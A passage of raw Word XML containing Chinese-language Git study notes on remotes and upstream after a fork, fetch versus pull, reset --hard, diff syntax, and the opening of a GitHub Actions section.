    <w:p w14:paraId="02E0F2AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACA83E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为什么非要创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个标识呢？因为有时候，本地的一个仓库会同时关联两个远程仓库：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163245F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假设一个用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fork</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了我的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>repo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，他的代码库链接为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://github.com/user2/repository</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B226C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A859997" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>fork</w:t>
      </w:r>
      <w:r>
        <w:t>是在远程服务器上克隆一份仓库，新的仓库也存在远程服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02621791" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082EC3C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>如果用户</w:t>
      </w:r>
      <w:r>
        <w:t>user2</w:t>
      </w:r>
      <w:r>
        <w:t>也照着这个</w:t>
      </w:r>
      <w:r>
        <w:t>url clone</w:t>
      </w:r>
      <w:r>
        <w:t>一把，然后在他的控制台</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>另一台电脑</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>里输入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0518B828" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>git remote -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205D965D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415E2F13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>他会看的的就是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5540D52D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>origin https://github.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>user2</w:t>
      </w:r>
      <w:r>
        <w:t>/repository.git (fetch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333F010E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>origin https://github.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>user2</w:t>
      </w:r>
      <w:r>
        <w:t>/repository.git (push)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13184A88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F01215" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>可以看的</w:t>
      </w:r>
      <w:r>
        <w:t>origin</w:t>
      </w:r>
      <w:r>
        <w:t>指向的位置是</w:t>
      </w:r>
      <w:r>
        <w:t>user2</w:t>
      </w:r>
      <w:r>
        <w:t>的的远程代码库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F27ED5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F864A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>这个时候，如果</w:t>
      </w:r>
      <w:r>
        <w:t>user2</w:t>
      </w:r>
      <w:r>
        <w:t>想加一个远程指向你的代码库，他可以在控制台输入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E39579E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E32E28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">git remote add upstream </w:t>
      </w:r>
      <w:r>
        <w:t>https://github.com/user1/repository.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6E5B46" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB03C62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>然后再输入一遍：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16095F09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git remote -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008F912C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC1019B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>输出结果就会变为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6748C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>`origin` https://github.com/user2/repository.git (fetch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F41B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>`origin` https://github.com/user2/repository.git (push)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1767BAE8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>`upstream` https://github.com/user1/repository.git (push)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017A1214" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>`upstream` https://github.com/user1/repository.git (push)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43143ACB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A205A0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>增加了指向</w:t>
      </w:r>
      <w:r>
        <w:t>user1</w:t>
      </w:r>
      <w:r>
        <w:t>代码库的</w:t>
      </w:r>
      <w:r>
        <w:t>upstream</w:t>
      </w:r>
      <w:r>
        <w:t>，这也是一个标识，这个是我们自己定义的，只是用来区分</w:t>
      </w:r>
      <w:r>
        <w:t>user1</w:t>
      </w:r>
      <w:r>
        <w:t>还是</w:t>
      </w:r>
      <w:r>
        <w:t>user2</w:t>
      </w:r>
      <w:r>
        <w:t>的远程仓库，</w:t>
      </w:r>
      <w:r>
        <w:t>upstream</w:t>
      </w:r>
      <w:r>
        <w:t>的名称只要不和已经出现的默认值</w:t>
      </w:r>
      <w:r>
        <w:t>origin</w:t>
      </w:r>
      <w:r>
        <w:t>重复就行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462BCE5C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19988241" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AC9C17F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc159779514"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git reset --hard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后要回到最新分支</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="7910DC5B" w14:textId="01F86FB4" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">git fetch </w:t>
      </w:r>
      <w:r w:rsidR="001C7984">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t>all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D4BA44" w14:textId="77777777" w:rsidR="00E21914" w:rsidRDefault="001C7984" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>it fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的意思，</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7984">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7984">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git remote </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7984">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中所有的远程仓库所包含分支的最新</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7984">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">commit-id, </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7984">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将其记录到</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7984">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.git/FETCH_HEAD</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7984">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0903AA48" w14:textId="77777777" w:rsidR="00E21914" w:rsidRDefault="00E21914" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B91BB11" w14:textId="42278A3E" w:rsidR="00E21914" w:rsidRDefault="00E21914" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以简单的概括为：</w:t>
      </w:r>
      <w:r w:rsidRPr="004C328E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git fetch</w:t>
      </w:r>
      <w:r w:rsidRPr="004C328E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是将远程主机的最新内容拉到本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用户在检查了以后决定是否合并到工作本机分支中。而</w:t>
      </w:r>
      <w:r w:rsidRPr="00891C27">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git pull</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则是将远程主机的</w:t>
      </w:r>
      <w:r w:rsidRPr="00891C27">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>最新内容拉下来后直接合并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即：</w:t>
      </w:r>
      <w:r w:rsidRPr="00891C27">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git pull = git fetch + git merge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这样可能会产生冲突，需要手动解决。下面我们来详细了解一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git fetch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="002354E4" w:rsidRPr="002354E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git pull </w:t>
      </w:r>
      <w:r w:rsidR="002354E4" w:rsidRPr="002354E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的用法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0D4CBF" w14:textId="6BFAA11C" w:rsidR="001C7984" w:rsidRDefault="001C7984" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399891C8" w14:textId="77777777" w:rsidR="004E5BD9" w:rsidRDefault="004E5BD9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61298BDD" w14:textId="77777777" w:rsidR="004E5BD9" w:rsidRDefault="004E5BD9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E28A3E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">git reset --hard origin/master </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDE37AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git pull</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670AC8CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8BDCD8" w14:textId="77777777" w:rsidR="004F001A" w:rsidRDefault="004F001A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF47B23" w14:textId="6564DA85" w:rsidR="004F001A" w:rsidRDefault="004F001A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc159779515"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>it diff</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="5056C119" w14:textId="3498F288" w:rsidR="004F001A" w:rsidRDefault="00A14D40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A14D40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何查看本地分支和远程分支之间的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A14D40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A638F63" w14:textId="2EAEB2E2" w:rsidR="00F85AEF" w:rsidRDefault="00F85AEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面绿色呈现加减的，是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git diff </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个被比较</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从前到后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的比较</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DC3995" w14:textId="77777777" w:rsidR="00F85AEF" w:rsidRDefault="00F85AEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E90001" w14:textId="430BA1C2" w:rsidR="004F001A" w:rsidRDefault="00A14D40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A14D40">
        <w:t>git branch -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5525EC65" w14:textId="77777777" w:rsidR="004F001A" w:rsidRDefault="004F001A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D368ECE" w14:textId="6396740C" w:rsidR="00256EA9" w:rsidRDefault="00256EA9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，两个分支名称之间是“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”作为分隔符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48068E3D" w14:textId="77777777" w:rsidR="006D47E9" w:rsidRDefault="006D47E9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">git diff --stat --color </w:t>
      </w:r>
      <w:r w:rsidRPr="00256EA9">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>remotes/main/master</w:t>
      </w:r>
      <w:r w:rsidRPr="00256EA9">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidRPr="00256EA9">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>origin/master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C445609" w14:textId="3E8B8CBB" w:rsidR="006D47E9" w:rsidRDefault="006D47E9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git diff remotes/main/master..origin/master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7867428F" w14:textId="77777777" w:rsidR="006D47E9" w:rsidRDefault="006D47E9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9C2BC6" w14:textId="71020630" w:rsidR="00B9724E" w:rsidRDefault="00B9724E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B9724E">
        <w:t>git diff &lt;commit&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1403655F" w14:textId="55EBB293" w:rsidR="006D47E9" w:rsidRDefault="00593074" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00593074">
        <w:t>git diff &lt;commit1&gt; &lt;commit2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A203D6E" w14:textId="77E19D4D" w:rsidR="004F001A" w:rsidRDefault="00593074" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00593074">
        <w:t>git diff &lt;branch1&gt; &lt;branch2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8162C9" w14:textId="296184AF" w:rsidR="00593074" w:rsidRDefault="00593074" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00593074">
        <w:t>git diff &lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE755C0" w14:textId="52D9E33D" w:rsidR="00181815" w:rsidRDefault="00181815" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00181815">
        <w:t>git diff &lt;commit1&gt; &lt;commit2&gt; -- &lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381A993F" w14:textId="2288AA3C" w:rsidR="00593074" w:rsidRDefault="00593074" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00593074">
        <w:t>git diff README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B197B7" w14:textId="77777777" w:rsidR="00593074" w:rsidRDefault="00593074" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C66253" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc159779516"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github action</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="0CB6DBAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://help.github.com/en/actions/language-and-framework-guides/using-python-with-github-actions#publishing-to-package-registries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E16474D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17BA2B71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己上传包的一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`.github/workflows/python-publish.yml`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C21590D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
